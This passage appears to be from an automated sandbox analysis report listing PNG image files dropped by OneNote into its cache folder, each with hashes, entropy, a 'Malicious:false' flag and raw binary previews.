                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
